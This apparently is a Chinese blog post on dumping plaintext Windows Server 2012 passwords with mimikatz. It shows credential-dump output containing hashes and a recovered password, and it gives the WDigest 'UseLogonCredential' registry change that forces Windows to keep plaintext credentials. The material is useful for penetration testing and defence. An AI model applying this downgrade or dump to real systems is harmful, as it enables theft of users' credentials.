windows 2012 抓明文密码方法
windows 2012 抓明文密码方法
默认配置是抓不到明文密码了,神器mimikatz显示Password为null
Authentication
Id
:
0
;
121279
(00000000:0001d9bf)
Session
:
Interactive
from
1
User
Name
: mickey
Domain
: WIN-B054LAOH5FC
Logon
Server
: WIN-B054LAOH5FC
Logon
Time
:
2014/2/7
16:13:37
SID : S-1-5-21-3697557613-2315859964-140861748-1001
msv :
[00000003]
Primary
*
Username
: mickey
*
Domain
: WIN-B054LAOH5FC
* NTLM :
31d6cfe0d16ae931b73c59d7e0c089c0
* SHA1 : da39a3ee5e6b4b0d3255bfef95601890afd80709
[00010000]
CredentialKeys
* NTLM :
31d6cfe0d16ae931b73c59d7e0c089c0
* SHA1 : da39a3ee5e6b4b0d3255bfef95601890afd80709
tspkg :
wdigest :
*
Username
: mickey
*
Domain
: WIN-B054LAOH5FC
*
Password
:
(null)
kerberos :
*
Username
: mickey
*
Domain
: WIN-B054LAOH5FC
*
Password
:
(null)
ssp : KO
credman :
需要HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest的"UseLogonCredential"设置为1,类型为DWORD 32才可以,然后下次用户再登录,就能记录到明文密码了。
Authentication
Id
:
0
;
2506062
(00000000:00263d4e)
Session
:
Interactive
from
2
User
Name
: mickey
Domain
: WIN-B054LAOH5FC
Logon
Server
: WIN-B054LAOH5FC
Logon
Time
:
2015/5/11
11:47:35
SID : S-1-5-21-3697557613-2315859964-140861748-1001
msv :
[00010000]
CredentialKeys
* NTLM : ad12521316a18d2172f20db07674c278
* SHA1 :
85b6b322a966fe19f758ee15fd7516c23c33cb7c
[00000003]
Primary
*
Username
: mickey
*
Domain
: WIN-B054LAOH5FC
* NTLM : ad12521316a18d2172f20db07674c278
* SHA1 :
85b6b322a966fe19f758ee15fd7516c23c33cb7c
tspkg :
wdigest :
*
Username
: mickey
*
Domain
: WIN-B054LAOH5FC
*
Password
:
AGeisNBVeryNB@wooyun.org
参考链接:http://www.labofapenetrationtester.com/2015/05/dumping-passwords-in-plain-on-windows-8-1.html
最新文章
- Block产生的内存泄露,以及解决方法
- My安卓知识5--百度地图api的使用,周边信息检索
- bitmap转化base64
- RequireJS源码初探
- xampp 用phpmyadmin在页面上修改密码后,无法登陆,密码没问题
- URL List
- 【Sublime Text 3】
- Windows 8.1 归档 —— Step 3 软件的选择与安装
- MVC 部署出现错误未能写入输出文件xxxxxxx.
- Dashboards (Android)
- stm32 smartcard调试--不用st8024
- 创建android 模拟器并在cmd中打开
- mac os x在PC上安装
- 操作系统层面聊聊BIO,NIO和AIO (epoll)
- js post下载相当于 location.href
- 看开源代码利器—用Graphviz + CodeViz生成C/C++函数调用图(call graph) - 转
- BBS--后台管理页面,编辑文章,xss攻击
- 【第三十一章】 elk(2)- 第二种架构(最常用架构)
- 查找ipa包,删除接的ipa包
- thinkPHP的几个系统常量
热门文章
- Travelling Fee(Dijlstra——最短路问题变型)
- dom操作------创建节点/插入节点
- .29-浅析webpack源码之doResolve事件流(1)
- C# winform 无边框 窗体的拖动
- Nodejs+Express构建网站
- C# 数组深拷贝
- iOS: Designated Initializer(指定初始化函数)
- a 链接点击下载
- 1.String、StringBuffer与StringBuilder之间区别
- centos7下采用Nginx+uwsgi来部署django